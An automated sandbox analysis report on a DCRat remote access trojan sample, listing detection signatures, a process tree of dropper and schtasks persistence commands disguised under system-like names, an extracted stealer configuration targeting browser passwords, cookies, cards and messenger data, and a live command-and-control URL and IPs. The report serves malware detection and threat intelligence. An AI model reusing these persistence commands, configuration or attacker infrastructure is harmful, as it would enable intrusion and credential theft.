Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6uPVRnocVS.exe

Overview

General Information

Sample name:6uPVRnocVS.exe
renamed because original name is a hash value
Original sample name:7a193e404a6285a41aba3019479d1749.exe
Analysis ID:1589210
MD5:7a193e404a6285a41aba3019479d1749
SHA1:e977d421b247ace0c630d118f05938460664c3b8
SHA256:661b2c9879d7ae68512f820689f2198fdc2d71288ed0a6e747a0ae3f4a27f176
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DCRat
Yara detected Telegram RAT
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 6uPVRnocVS.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\6uPVRnocVS.exe" MD5: 7A193E404A6285A41ABA3019479D1749)
    • wscript.exe (PID: 6676 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7052 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • System.exe (PID: 3604 cmdline: "C:\\ProgramData\ssh\System.exe" MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
          • schtasks.exe (PID: 3744 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4816 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5652 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3336 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5016 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4564 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6224 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1612 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4456 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1848 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7064 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6288 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6636 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6516 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6492 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7032 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7068 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6840 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2536 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6912 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7076 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6980 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Recovery\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6996 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6364 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5496 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5676 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5000 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4928 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5772 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1748 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4456 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • Idle.exe (PID: 4476 cmdline: C:\Recovery\Idle.exe MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
  • Idle.exe (PID: 2944 cmdline: C:\Recovery\Idle.exe MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
  • lmXqPxTfNHomnnafzTOKZnFns.exe (PID: 1704 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe" MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
  • lmXqPxTfNHomnnafzTOKZnFns.exe (PID: 5324 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe" MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"M\":\")\",\"a\":\"!\",\"T\":\"~\",\"C\":\"-\",\"5\":\".\",\"I\":\"_\",\"J\":\";\",\"m\":\"(\",\"y\":\" \",\"0\":\"^\",\"k\":\"@\",\"9\":\"$\",\"6\":\"`\",\"i\":\"#\",\"4\":\",\",\"d\":\"<\",\"w\":\">\",\"O\":\"*\",\"t\":\"%\",\"e\":\"&\",\"L\":\"|\"}", "PCRT": "{\"V\":\"(\",\"j\":\"_\",\"U\":\"`\",\"R\":\"~\",\"Z\":\"|\",\"B\":\"%\",\"D\":\"$\",\"Q\":\">\",\"F\":\"@\",\"b\":\";\",\"t\":\"-\",\"h\":\",\",\"d\":\"!\",\"Y\":\")\",\"C\":\"<\",\"N\":\"^\",\"l\":\"*\",\"0\":\"#\",\"X\":\"&\",\"E\":\" \",\"1\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ZAWMDQZINKVcPXj9SzKG", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_DCRat_4Yara detected DCRatJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000022.00000002.1886936604.0000000002681000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000024.00000002.1893402647.00000000027E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000021.00000002.1896236954.0000000002401000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000004.00000002.1800682479.000000000329F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              Click to see the 12 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\ssh\System.exe, ProcessId: 3604, TargetFilename: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\6uPVRnocVS.exe", ParentImage: C:\Users\user\Desktop\6uPVRnocVS.exe, ParentProcessId: 6492, ParentProcessName: 6uPVRnocVS.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , ProcessId: 6676, ProcessName: wscript.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f, CommandLine: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\\ProgramData\ssh\System.exe", ParentImage: C:\ProgramData\ssh\System.exe, ParentProcessId: 3604, ParentProcessName: System.exe, ProcessCommandLine: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f, ProcessId: 6224, ProcessName: schtasks.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\6uPVRnocVS.exe", ParentImage: C:\Users\user\Desktop\6uPVRnocVS.exe, ParentProcessId: 6492, ParentProcessName: 6uPVRnocVS.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , ProcessId: 6676, ProcessName: wscript.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T18:07:16.689498+010020341941A Network Trojan was detected192.168.2.4512885.101.152.1580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T18:07:52.644367+010028508621Malware Command and Control Activity Detected5.101.152.1580192.168.2.453647TCP
              2025-01-11T18:09:12.682023+010028508621Malware Command and Control Activity Detected5.101.152.1580192.168.2.453928TCP
              2025-01-11T18:10:39.213109+010028508621Malware Command and Control Activity Detected5.101.152.1580192.168.2.453943TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T18:07:20.259693+010018100091Potentially Bad Traffic192.168.2.453641149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 6uPVRnocVS.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://monrul3t.beget.tech/c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgdAvira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech/Avira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=ZtAvira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2NAvira URL Cloud: Label: malware
              Source: http://monrul3t.beget.techAvira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3WAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Windows\LiveKernelReports\WinStore.App.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbeAvira: detection malicious, Label: VBS/Runner.VPG
              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\ProgramData\ssh\System.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Recovery\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Recovery\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Users\user\AppData\Local\Temp\e65pqCzUjZ.batAvira: detection malicious, Label: BAT/Delbat.C
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Found malware configuration
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe.5324.36.memstrminMalware Configuration Extractor: DCRat {"SCRT": "{\"M\":\")\",\"a\":\"!\",\"T\":\"~\",\"C\":\"-\",\"5\":\".\",\"I\":\"_\",\"J\":\";\",\"m\":\"(\",\"y\":\" \",\"0\":\"^\",\"k\":\"@\",\"9\":\"$\",\"6\":\"`\",\"i\":\"#\",\"4\":\",\",\"d\":\"<\",\"w\":\">\",\"O\":\"*\",\"t\":\"%\",\"e\":\"&\",\"L\":\"|\"}", "PCRT": "{\"V\":\"(\",\"j\":\"_\",\"U\":\"`\",\"R\":\"~\",\"Z\":\"|\",\"B\":\"%\",\"D\":\"$\",\"Q\":\">\",\"F\":\"@\",\"b\":\";\",\"t\":\"-\",\"h\":\",\",\"d\":\"!\",\"Y\":\")\",\"C\":\"<\",\"N\":\"^\",\"l\":\"*\",\"0\":\"#\",\"X\":\"&\",\"E\":\" \",\"1\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ZAWMDQZINKVcPXj9SzKG", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
              Multi AV Scanner detection for dropped file
              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exeReversingLabs: Detection: 81%
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeReversingLabs: Detection: 81%
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeReversingLabs: Detection: 81%
              Source: C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exeReversingLabs: Detection: 81%
              Source: C:\ProgramData\ssh\System.exeReversingLabs: Detection: 81%
              Source: C:\Recovery\Idle.exeReversingLabs: Detection: 81%
              Source: C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exeReversingLabs: Detection: 81%
              Source: C:\Recovery\upfc.exeReversingLabs: Detection: 81%
              Source: C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exeReversingLabs: Detection: 81%
              Source: C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exeReversingLabs: Detection: 81%
              Source: C:\Windows\LiveKernelReports\WinStore.App.exeReversingLabs: Detection: 81%
              Source: C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exeReversingLabs: Detection: 81%
              Multi AV Scanner detection for submitted file
              Source: 6uPVRnocVS.exeVirustotal: Detection: 65%Perma Link
              Source: 6uPVRnocVS.exeReversingLabs: Detection: 71%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeJoe Sandbox ML: detected
              Source: C:\Windows\LiveKernelReports\WinStore.App.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exeJoe Sandbox ML: detected
              Source: C:\ProgramData\ssh\System.exeJoe Sandbox ML: detected
              Source: C:\Recovery\upfc.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeJoe Sandbox ML: detected
              Source: C:\Recovery\Idle.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 6uPVRnocVS.exeJoe Sandbox ML: detected
